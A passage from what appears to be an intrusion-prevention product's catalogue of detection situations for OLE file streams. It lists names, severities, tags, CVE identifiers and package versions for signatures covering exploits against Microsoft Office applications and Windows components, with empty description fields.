Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint 2002, Microsoft PowerPoint 2003, MS2011-05, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269

About this situation: Detected attempt to exploit a vulnerability in Microsoft PowerPoint
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2004, Microsoft Office 2008, Microsoft PowerPoint 2002, Microsoft PowerPoint 2003, Microsoft PowerPoint 2007, MS2011-05, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Slide

About this situation: Microsoft PowerPoint slide download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft PowerPoint, Windows not specific, Microsoft PowerPoint not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, Microsoft Office, Microsoft Office System, MS2008-08, CVE2008, Any Operating System not specific, Microsoft PowerPoint not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint Viewer detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint Viewer, MS2008-08, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
Description:
Back to top

File-OLE_Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955

About this situation: Detected attempt to exploit a vulnerability in Microsoft Publisher
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2002, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
Description:
Back to top

File-OLE_Microsoft-Publisher-Document-With-Suspicious-VBA-Script

About this situation: A suspicious Microsoft Publisher document detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Publisher, MS2024-09, CVE2024, Windows not specific, Microsoft Office not specific, Microsoft Publisher not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1775-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: Microsoft-Publisher-Security-Features-Bypass-CVE-2024-38226
Description:
Back to top

File-OLE_Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Publisher detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2002, Microsoft Publisher 2003, Microsoft Publisher 2007, MS2010-04, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411

About this situation: Detected attempt to exploit a vulnerability in Microsoft Publisher
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2003, MS2011-12, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1845-5242
Vulnerability: Microsoft-Publisher-Invalid-Pointer-CVE-2011-3411
Description:
Back to top

File-OLE_Microsoft-Publisher-Memory-Corruption-CVE-2011-3412

About this situation: Detected attempt to exploit a vulnerability in Microsoft Publisher
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2003, Microsoft Publisher 2007, MS2011-12, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Microsoft-Publisher-Memory-Corruption-CVE-2011-3412
Description:
Back to top

File-OLE_Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410

About this situation: Detected attempt to exploit a vulnerability in Microsoft Publisher
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2003, Microsoft Publisher 2007, MS2011-12, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Microsoft-Publisher-Out-Of-Bounds-Array-Index-CVE-2011-3410
Description:
Back to top

File-OLE_Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite

About this situation: An attempt to exploit a vulnerability in Microsoft Office Publisher detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher, MS2011-12, CVE2011, Windows not specific, Microsoft Publisher not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-432-4219
Vulnerability: Microsoft-Publisher-Pubconv.dll-Function-Pointer-Overwrite
Description:
Back to top

File-OLE_Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569

About this situation: Detected attempt to exploit a vulnerability in Microsoft Publisher
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2002, Microsoft Publisher 2007, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
Description:
Back to top

File-OLE_Microsoft-Structured-Storage-Excessive-SAT-Size

About this situation: Detected a download of a suspicious OLE Structured Storage file
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, Microsoft Office, CVE2009, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
Apple-QuickTime-FlashPix-File-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Structured-Storage-File

About this situation: Detected a download of OLE Structured Storage file
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Structured-Storage-Suspicious-File

About this situation: Detected a download of a suspicious OLE Structured Storage file
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
Description:
Back to top

File-OLE_Microsoft-VBA6-Stack-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic for Applications detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2007, MS2010-05, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-VBA6-Stack-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Visio-Drawing

About this situation: Microsoft Visio Drawing download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Visio, Windows not specific, Microsoft Visio not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-626-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Visio-Version-Number-Handling-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Visio was detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio, MS2007-06, CVE2007, Windows not specific, Microsoft Visio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Visio-Version-Number-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Visio-Viewer-VSD-File-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Visio Viewer detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio Viewer, MS2012-05, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-590-5211
Vulnerability: Microsoft-Visio-Viewer-VSD-File-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019

About this situation: An attempt to exploit a vulnerability in Microsoft Visio Viewer detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio Viewer, MS2012-02, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019
Description:
Back to top

File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136

About this situation: An attempt to exploit a vulnerability in Microsoft Visio Viewer detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio Viewer, MS2012-02, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136
Description:
Back to top

File-OLE_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2013-02, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, MS2015-12, CVE2015, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Vulnerability: Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
Description:
Back to top

File-OLE_Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-01, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-707-5211
Vulnerability: Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application
Description:
Back to top

File-OLE_Microsoft-Windows-Els.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows 7, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Any Hardware, MS2015-12, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Microsoft-Windows-Els.dll-Insecure-Library-Loading
Description:
Back to top

File-OLE_Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows RT, Windows 2012, Windows 2008, Any Hardware, MS2013-11, CVE2013, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-550-5211
Vulnerability: Microsoft-Windows-Graphics-Device-Integer-Overflow-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2015-07, CVE2015, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-663-5211
Vulnerability: Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
Description:
Back to top

File-OLE_Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Producer detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Movie Maker, Microsoft Producer, MS2010-03, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Movie-Maker-And-Producer-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Movie Maker detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Movie Maker, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Movie-Maker-Mediaclipstring-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-08, MS2013-02, CVE2012, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-468-5211
Vulnerability: Microsoft-Windows-MSCOMCTL.OCX-RCE-Vulnerability
Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Microsoft-Windows-MSI-File-Signature-Spoofing-Vulnerability
Description:
Back to top

File-OLE_Microsoft-Windows-Object-Packager-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-10, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Microsoft-Windows-Object-Packager-Remote-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-03, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-745-5211
Vulnerability: Microsoft-Windows-OLE-CVE-2016-0091-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-03, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Vulnerability: Microsoft-Windows-OLE-CVE-2016-0092-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-04, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1653-5242
Vulnerability: Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Windows-OLE-Packer-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office PowerPoint detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-11, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Microsoft-Windows-OLE-Packer-Remote-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-01, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016
Description:
Back to top

File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-01, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
Description:
Back to top

File-OLE_Microsoft-Windows-Shell-MSHTA-Script-Execution

About this situation: Detects crafted OLE Compound files that allow script code execution in Windows
Context: OLE File Stream
Severity: 7
Tags: Windows, x86, MS2005-04, CVE2005, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Microsoft-Windows-Shell-MSHTA-Script-Execution
Description:
Back to top

File-OLE_Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-04, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Word-6-Document

About this situation: Microsoft Word 6.0/7.0 document file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Word-Crafted-Smarttag-Record-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2008-08, CVE2008, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-Word-Crafted-Smarttag-Record-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption

About this situation: Microsoft Word Crafted Sprm Structure Stack Memory Corruption
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2008-12, CVE2008, Windows not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Word-Document

About this situation: Microsoft Word document file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Word-Fcplcffldmom-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2015-09, CVE2015, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-688-5211
Last changed: sgpkg-ips-688-5211
Vulnerability: Microsoft-Word-Fcplcffldmom-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption

About this situation: Malicious Word document detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Word, MS2007-02, CVE2006, Any Operating System not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Word-Global-Array-Index-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2008-12, CVE2008, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-Word-Global-Array-Index-Heap-Overflow
Description:
Back to top

File-OLE_Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903

About this situation: A malicious Word document targeting CVE-2010-1903 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
Description:
Back to top

File-OLE_Microsoft-Word-Malformed-Index-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2010-10, CVE2010, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-Word-Malformed-Index-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Word-RCE-Vulnerability-CVE-2015-0097

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2015-03, CVE2015, Windows not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Microsoft-Word-RCE-Vulnerability-CVE-2015-0097
Description:
Back to top

File-OLE_Microsoft-Word-Section-Table-Array-Buffer-Overflow

About this situation: Malicious Word document detected
Context: OLE File Stream
Severity: 7
Tags: Windows, x86, Microsoft Word, MS2007-02, CVE2007, Windows not specific, Microsoft Word not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Microsoft-Word-Section-Table-Array-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Word-Sprmsdyatop-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2016-08, CVE2016, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-791-5211
Vulnerability: Microsoft-Word-Sprmsdyatop-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-WordPad-Text-Converter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft WordPad detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, WordPad, MS2010-09, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-WordPad-Text-Converter-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-WordPad-Text-Converter-CVE-2010-2563

About this situation: An attempt to exploit a vulnerability in Microsoft WordPad
Context: OLE File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Any Hardware, WordPad, MS2010-09, CVE2010, Windows XP not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-WordPad-Text-Converter-CVE-2010-2563
Description:
Back to top

File-OLE_Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-04, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Works detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Works, MS2008-02, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
Description:
Back to top

File-OLE_Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Works, MS2008-02, CVE2008, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
Description:
Back to top

File-OLE_Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Works, MS2008-02, CVE2007, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
Description:
